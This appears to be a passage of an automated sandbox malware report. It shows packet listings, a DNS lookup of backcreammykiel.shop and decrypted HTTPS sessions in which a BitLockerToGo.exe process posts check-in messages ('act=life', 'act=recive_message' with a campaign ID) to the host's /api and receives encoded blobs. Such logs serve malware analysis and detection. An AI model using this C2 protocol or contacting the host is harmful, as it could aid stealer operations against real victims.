Jun 18, 2024 22:59:40.489447117 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.489604950 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.490108013 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.490134954 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.946386099 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.946463108 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.948060036 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.948076010 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.948576927 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.949762106 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.949938059 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.949973106 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:40.950036049 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:40.950047016 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:41.431049109 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:41.431138039 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:41.431212902 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:41.431313038 CEST	62540	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:41.431335926 CEST	443	62540	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:41.599201918 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:41.599292040 CEST	443	62541	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:41.599414110 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:41.599880934 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:41.599965096 CEST	443	62541	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:42.104012966 CEST	443	62541	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:42.104175091 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.105782986 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.105817080 CEST	443	62541	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:42.106164932 CEST	443	62541	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:42.107326031 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.107515097 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.107556105 CEST	443	62541	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:42.517714024 CEST	443	62541	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:42.517816067 CEST	443	62541	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:42.517904043 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.517991066 CEST	62541	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.749855995 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.749953985 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:42.750083923 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.750370026 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:42.750394106 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:43.239432096 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:43.239633083 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:43.241688967 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:43.241750002 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:43.242278099 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:43.244136095 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:43.244275093 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:43.244333982 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:43.244430065 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:43.244465113 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:43.807338953 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:43.807444096 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:43.807543993 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:43.807667971 CEST	62542	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:43.807713032 CEST	443	62542	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:44.171471119 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:44.171514034 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:44.171590090 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:44.172148943 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:44.172168016 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:44.659907103 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:44.660145044 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:44.661170959 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:44.661184072 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:44.661668062 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:44.663402081 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:44.663516998 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:44.663588047 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.077769995 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.077960968 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.078035116 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.078130007 CEST	62543	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.078155994 CEST	443	62543	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.148885965 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.148974895 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.149068117 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.149357080 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.149391890 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.652194977 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.652286053 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.653727055 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.653745890 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.654249907 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:45.655927896 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.656012058 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:45.656021118 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:46.045326948 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:46.045561075 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:46.045665026 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:46.045665026 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:46.349967957 CEST	62544	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:46.349993944 CEST	443	62544	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:46.605154991 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:46.605212927 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:46.605288029 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:46.605575085 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:46.605592966 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.075828075 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.075917006 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.077480078 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.077487946 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.077724934 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.079157114 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.079924107 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.079955101 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.080051899 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.080080986 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.080185890 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.080219984 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.080355883 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.080379009 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.080885887 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.080900908 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.081063032 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.081089973 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.081098080 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.082968950 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.082998991 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.108825922 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.109123945 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.109157085 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.109179020 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.109193087 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.109322071 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.109357119 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.114084959 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:47.114248037 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:47.114284039 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:49.050672054 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:49.050924063 CEST	443	62545	104.21.90.18	192.168.2.4
Jun 18, 2024 22:59:49.050946951 CEST	62545	443	192.168.2.4	104.21.90.18
Jun 18, 2024 22:59:49.050986052 CEST	62545	443	192.168.2.4	104.21.90.18

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 18, 2024 22:59:29.974267006 CEST	53	53977	1.1.1.1	192.168.2.4
Jun 18, 2024 22:59:38.046397924 CEST	50414	53	192.168.2.4	1.1.1.1
Jun 18, 2024 22:59:38.058319092 CEST	53	50414	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 18, 2024 22:59:38.046397924 CEST	192.168.2.4	1.1.1.1	0xe5c4	Standard query (0)	backcreammykiel.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 18, 2024 22:59:38.058319092 CEST	1.1.1.1	192.168.2.4	0xe5c4	No error (0)	backcreammykiel.shop		104.21.90.18	A (IP address)	IN (0x0001)	false
Jun 18, 2024 22:59:38.058319092 CEST	1.1.1.1	192.168.2.4	0xe5c4	No error (0)	backcreammykiel.shop		172.67.151.5	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

backcreammykiel.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62538	104.21.90.18	443	3592	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-18 20:59:38 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: backcreammykiel.shop
2024-06-18 20:59:38 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-06-18 20:59:39 UTC	812	IN	HTTP/1.1 200 OK Date: Tue, 18 Jun 2024 20:59:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k4beq0blgpad9n4r72afl4mit2; expires=Sat, 12-Oct-2024 14:46:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zcoTUsDUDr3CPdakmb2g%2F2zL02cjOhtErXlD8KXWXXfK%2FrZYKf%2FmCQ3kbcCwyV9pbAZu9Wp80vwX8tAcxY%2Bmro0piQfSnULsyTHNtAMXY5hGp%2FZNP0lpFqhbbkaVONuN8EF0Aj1Kg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 895e344ea97641d3-EWR alt-svc: h3=":443"; ma=86400
2024-06-18 20:59:39 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-06-18 20:59:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62539	104.21.90.18	443	3592	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-18 20:59:39 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: backcreammykiel.shop
2024-06-18 20:59:39 UTC	61	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 7a 6f 64 69 61 6b 77 30 72 6c 64 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--@zodiakw0rld&j=default
2024-06-18 20:59:40 UTC	808	IN	HTTP/1.1 200 OK Date: Tue, 18 Jun 2024 20:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uqkfeaph9250kggf08rc540hcp; expires=Sat, 12-Oct-2024 14:46:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=adG%2FsCJ9r8C0MOnTl5Lvi6H7tRZf1pN8EDlKFPTqk3ACa8h2dI4PZvp8nBGaOk2pJ%2FMUOIqrXtvUJp%2FZQLA0dcpBug4u9nCikKCO6Fqna5muNZtKQS7OrPvXnKhWUFqn5Yt4bRsJ5g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 895e34549e397ce8-EWR alt-svc: h3=":443"; ma=86400
2024-06-18 20:59:40 UTC	561	IN	Data Raw: 31 65 38 66 0d 0a 32 31 64 47 47 67 38 4d 2f 61 35 68 61 66 38 65 66 63 35 4a 2f 54 69 56 7a 52 41 37 6c 53 54 35 4f 33 6d 69 64 61 50 73 6b 6a 2b 67 58 57 59 36 4c 58 72 66 6c 45 46 64 30 78 52 64 37 6d 75 4f 58 62 66 33 4d 45 2f 6e 55 5a 77 58 63 34 4a 56 67 59 33 32 48 65 46 33 49 48 74 6a 66 35 69 43 61 30 6e 66 50 42 69 32 61 38 63 59 7a 73 63 77 47 37 55 45 67 68 74 62 78 78 75 42 31 72 49 64 76 6a 30 6b 65 32 4e 75 6e 4d 55 4f 47 5a 4e 39 46 61 49 75 6c 56 33 32 71 58 46 58 2b 45 47 63 58 68 6a 49 47 38 71 42 2b 6c 4c 35 65 32 59 34 61 6e 62 66 6c 45 46 4c 73 6e 73 4a 72 77 53 63 53 2f 37 76 4d 45 61 35 4c 74 6b 62 57 59 49 4f 67 38 37 33 55 66 6c 74 5a 6a 68 75 61 5a 2f 43 42 77 32 55 64 68 57 6d 4c 5a 35 63 2f 37 31 35 58 66 31 4d 6d 31 38 51 7a Data Ascii: 1e8f21dGGg8M/a5haf8efc5J/TiVzRA7lST5O3midaPskj+gXWY6LXrflEFd0xRd7muOXbf3ME/nUZwXc4JVgY32HeF3IHtjf5iCa0nfPBi2a8cYzscwG7UEghtbxxuB1rIdvj0ke2NunMUOGZN9FaIulV32qXFX+EGcXhjIG8qB+lL5e2Y4anbflEFLsnsJrwScS/7vMEa5LtkbWYIOg873UfltZjhuaZ/CBw2UdhWmLZ5c/715Xf1Mm18Qz
2024-06-18 20:59:40 UTC	1369	IN	Data Raw: 35 64 57 5a 6e 49 77 62 64 6a 6b 46 4a 68 44 35 66 71 79 66 66 41 72 58 76 64 6c 6a 7a 52 35 39 58 46 63 51 62 78 34 44 39 55 72 38 2f 4a 48 39 6e 5a 70 66 4e 44 67 43 53 66 42 71 68 4c 35 6c 57 39 71 6f 79 46 37 55 47 6e 45 46 62 6d 46 57 42 6f 50 64 65 71 33 63 52 65 32 4e 67 6d 4e 70 44 53 59 49 79 64 2b 35 70 33 52 6a 75 37 54 4a 65 2b 77 62 44 47 31 76 4f 45 73 36 63 38 55 2b 38 4f 7a 5a 30 61 47 69 53 7a 77 30 4c 6d 48 73 53 6f 69 32 59 57 66 2b 72 63 31 66 37 54 4a 68 64 47 49 42 5a 67 38 37 33 52 66 6c 74 5a 6a 68 63 62 5a 76 4c 45 51 69 54 50 46 32 7a 5a 66 63 59 74 65 30 77 51 4c 55 47 6e 46 56 62 6d 46 57 42 68 50 5a 51 73 44 34 6a 63 47 46 38 6c 4d 4d 41 41 70 70 36 46 61 38 6a 6c 56 7a 35 72 6e 56 63 38 46 53 56 55 68 62 44 48 63 66 4f 76 68 Data Ascii: 5dWZnIwbdjkFJhD5fqyffArXvdljzR59XFcQbx4D9Ur8/JH9nZpfNDgCSfBqhL5lW9qoyF7UGnEFbmFWBoPdeq3cRe2NgmNpDSYIyd+5p3Rju7TJe+wbDG1vOEs6c8U+8OzZ0aGiSzw0LmHsSoi2YWf+rc1f7TJhdGIBZg873RfltZjhcbZvLEQiTPF2zZfcYte0wQLUGnFVbmFWBhPZQsD4jcGF8lMMAApp6Fa8jlVz5rnVc8FSVUhbDHcfOvh
2024-06-18 20:59:40 UTC	1369	IN	Data Raw: 65 57 64 67 6d 73 59 50 41 35 4e 2f 44 61 4d 76 6e 31 62 2f 70 58 39 58 38 30 36 53 55 68 44 47 46 38 43 45 73 42 50 37 64 53 4e 67 4c 54 62 64 6a 44 63 4d 6b 58 45 51 37 68 36 63 56 50 6d 6f 5a 42 6d 31 57 64 55 78 57 59 4a 56 67 35 65 79 48 62 34 35 5a 43 41 76 4c 70 50 46 41 77 43 58 65 42 2b 72 4a 70 70 5a 38 4b 78 2f 58 76 31 49 6e 46 30 58 79 52 72 48 6a 76 64 5a 76 43 63 68 63 57 46 69 33 34 4a 42 53 35 70 6b 58 2f 52 70 33 33 58 77 75 58 46 32 39 46 65 53 47 56 6e 66 57 61 6e 4d 73 68 2f 37 4c 47 59 34 61 6d 4c 66 6c 45 46 4c 6d 6e 6b 58 70 79 32 58 57 75 57 71 66 46 4c 32 54 4a 31 59 46 73 77 52 77 59 2f 77 57 37 55 31 49 33 39 2f 66 4a 72 4b 45 51 48 64 4d 6c 33 73 4c 49 63 61 72 2b 30 79 62 2b 64 52 69 6b 39 5a 39 52 54 50 67 50 64 4c 2b 58 63 Data Ascii: eWdgmsYPA5N/DaMvn1b/pX9X806SUhDGF8CEsBP7dSNgLTbdjDcMkXEQ7h6cVPmoZBm1WdUxWYJVg5eyHb45ZCAvLpPFAwCXeB+rJppZ8Kx/Xv1InF0XyRrHjvdZvCchcWFi34JBS5pkX/Rp33XwuXF29FeSGVnfWanMsh/7LGY4amLflEFLmnkXpy2XWuWqfFL2TJ1YFswRwY/wW7U1I39/fJrKEQHdMl3sLIcar+0yb+dRik9Z9RTPgPdL+Xc
2024-06-18 20:59:40 UTC	1369	IN	Data Raw: 70 6a 41 51 31 50 66 50 42 61 67 4b 70 35 51 38 61 52 33 56 50 64 44 6b 56 34 58 77 42 66 43 69 50 5a 51 73 54 30 6f 64 47 35 6a 6d 73 67 52 47 5a 6c 30 58 2b 4a 70 33 31 33 76 37 79 6f 62 74 30 32 75 56 77 32 41 56 64 37 41 6d 42 2f 37 64 32 5a 68 4c 79 36 59 77 45 4e 54 33 7a 77 57 70 54 6d 52 56 50 36 69 64 46 48 77 53 4a 5a 53 48 63 73 51 78 6f 6a 39 56 62 51 77 4a 33 6c 70 5a 49 33 50 43 41 47 51 64 6c 2f 69 61 64 39 64 37 2b 38 71 47 37 64 68 6c 33 41 4c 32 77 58 58 7a 72 4a 43 39 31 31 6d 4f 69 38 73 68 6f 35 44 44 4a 45 38 52 2b 35 72 6e 46 58 2b 6f 48 70 52 2b 45 6d 66 56 78 33 47 47 73 53 42 2b 6b 2b 78 4f 79 6c 7a 59 6d 57 4e 7a 41 34 50 6b 58 67 58 70 79 48 66 46 4c 58 76 64 55 47 33 48 74 6b 5a 4c 73 30 59 77 59 33 6d 48 66 73 71 61 68 41 76 Data Ascii: pjAQ1PfPBagKp5Q8aR3VPdDkV4XwBfCiPZQsT0odG5jmsgRGZl0X+Jp313v7yobt02uVw2AVd7AmB/7d2ZhLy6YwENT3zwWpTmRVP6idFHwSJZSHcsQxoj9VbQwJ3lpZI3PCAGQdl/iad9d7+8qG7dhl3AL2wXXzrJC911mOi8sho5DDJE8R+5rnFX+oHpR+EmfVx3GGsSB+k+xOylzYmWNzA4PkXgXpyHfFLXvdUG3HtkZLs0YwY3mHfsqahAv
2024-06-18 20:59:40 UTC	1369	IN	Data Raw: 46 4c 6d 6d 52 66 39 47 6e 66 66 65 32 69 64 45 37 6d 63 35 78 5a 53 6f 42 56 33 73 43 59 48 2f 74 33 5a 6d 45 76 4c 70 6a 41 51 31 50 66 50 42 4b 67 49 5a 4a 66 38 36 64 31 57 76 5a 4b 6e 31 51 57 78 42 37 46 69 2b 4a 50 76 7a 73 6b 64 32 4e 68 6b 39 34 4e 44 70 31 77 58 2b 4a 70 33 31 33 76 37 79 6f 62 74 33 65 4d 57 56 75 43 43 49 2f 6d 73 68 2f 37 64 7a 30 36 4c 57 6d 54 6a 46 74 4a 33 58 4d 53 76 69 65 51 57 76 61 73 64 6c 4c 77 51 4a 31 59 47 4d 55 55 78 49 6a 78 58 62 55 2f 49 33 42 6e 59 4a 4c 4b 42 77 32 62 50 46 48 75 61 35 68 43 74 2f 63 77 47 63 56 4c 6c 56 41 59 78 68 72 58 70 73 45 64 2b 79 70 71 45 43 38 73 33 59 34 61 53 64 31 37 45 2b 78 7a 33 52 72 7a 70 48 70 56 38 6b 36 65 57 42 50 4b 48 38 36 42 34 6c 79 32 50 43 4e 7a 59 47 47 52 79 Data Ascii: FLmmRf9Gnffe2idE7mc5xZSoBV3sCYH/t3ZmEvLpjAQ1PfPBKgIZJf86d1WvZKn1QWxB7Fi+JPvzskd2Nhk94NDp1wX+Jp313v7yobt3eMWVuCCI/msh/7dz06LWmTjFtJ3XMSvieQWvasdlLwQJ1YGMUUxIjxXbU/I3BnYJLKBw2bPFHua5hCt/cwGcVLlVAYxhrXpsEd+ypqEC8s3Y4aSd17E+xz3RrzpHpV8k6eWBPKH86B4ly2PCNzYGGRy
2024-06-18 20:59:40 UTC	1369	IN	Data Raw: 6c 58 65 77 73 6b 78 71 76 37 54 4a 58 2b 6b 43 61 57 42 50 49 46 38 65 45 39 46 36 77 4e 69 4e 78 61 32 57 63 78 67 77 4d 6d 33 67 66 70 79 79 52 58 50 4b 6b 65 78 6d 35 42 4e 74 65 41 34 42 50 67 38 37 57 66 71 73 6e 46 6e 5a 75 64 64 2b 4f 48 45 58 31 50 6c 33 75 61 59 59 59 74 36 68 2b 47 61 38 45 32 31 49 54 7a 77 58 45 68 2f 68 5a 73 44 55 67 63 6d 42 70 6e 38 6b 4f 44 70 6c 79 47 36 73 72 6b 31 58 77 70 33 31 64 39 30 6e 62 46 31 6d 41 45 4e 6e 4f 71 42 2f 35 46 53 39 75 54 47 43 55 33 6b 4e 4a 67 6a 4a 33 37 6d 6e 64 47 4f 37 74 4d 6c 37 37 42 73 4d 62 57 38 34 65 77 49 62 2b 55 62 45 78 4e 6e 68 6d 5a 35 44 4e 44 41 75 65 66 52 57 6b 4f 5a 6c 61 2f 4b 64 31 55 66 4e 49 69 56 67 55 67 46 6d 44 7a 76 64 46 2b 57 31 6d 4f 46 78 34 6d 4d 73 4d 53 62 Data Ascii: lXewskxqv7TJX+kCaWBPIF8eE9F6wNiNxa2WcxgwMm3gfpyyRXPKkexm5BNteA4BPg87WfqsnFnZudd+OHEX1Pl3uaYYYt6h+Ga8E21ITzwXEh/hZsDUgcmBpn8kODplyG6srk1Xwp31d90nbF1mAENnOqB/5FS9uTGCU3kNJgjJ37mndGO7tMl77BsMbW84ewIb+UbExNnhmZ5DNDAuefRWkOZla/Kd1UfNIiVgUgFmDzvdF+W1mOFx4mMsMSb
2024-06-18 20:59:40 UTC	425	IN	Data Raw: 61 64 31 44 74 65 39 31 56 62 63 65 32 52 6b 65 77 78 44 48 67 66 68 62 76 54 6f 72 65 32 64 6b 6e 38 51 45 44 35 78 38 47 71 38 6d 6b 56 44 39 72 48 35 58 39 45 75 56 57 56 75 4f 56 59 47 4a 36 42 33 68 64 32 52 62 65 6e 69 56 31 30 4e 4a 67 6a 4a 33 37 6d 6e 64 47 4f 37 74 4d 6c 37 37 42 73 4d 62 57 38 30 51 7a 34 62 32 55 37 38 6e 4b 48 64 72 62 70 37 47 44 67 65 57 65 78 47 6e 4c 5a 70 58 39 36 6c 30 58 66 4e 43 6c 56 70 62 6a 6c 57 42 69 65 67 64 34 58 64 6b 58 30 42 66 33 65 38 55 48 5a 64 37 45 37 6f 67 6e 6c 6e 68 6f 6d 49 5a 74 56 6e 56 4d 56 6d 43 56 59 4f 58 73 68 32 2b 4f 57 51 67 4c 79 36 55 77 67 59 4b 6b 58 59 59 6f 6a 6d 65 55 50 75 75 64 56 37 38 56 4a 42 4c 45 4d 67 55 7a 34 62 35 58 62 63 31 4a 58 56 74 4c 74 47 4f 51 77 79 46 50 45 66 Data Ascii: ad1Dte91Vbce2RkewxDHgfhbvTore2dkn8QED5x8Gq8mkVD9rH5X9EuVWVuOVYGJ6B3hd2RbeniV10NJgjJ37mndGO7tMl77BsMbW80Qz4b2U78nKHdrbp7GDgeWexGnLZpX96l0XfNClVpbjlWBiegd4XdkX0Bf3e8UHZd7E7ognlnhomIZtVnVMVmCVYOXsh2+OWQgLy6UwgYKkXYYojmeUPuudV78VJBLEMgUz4b5Xbc1JXVtLtGOQwyFPEf
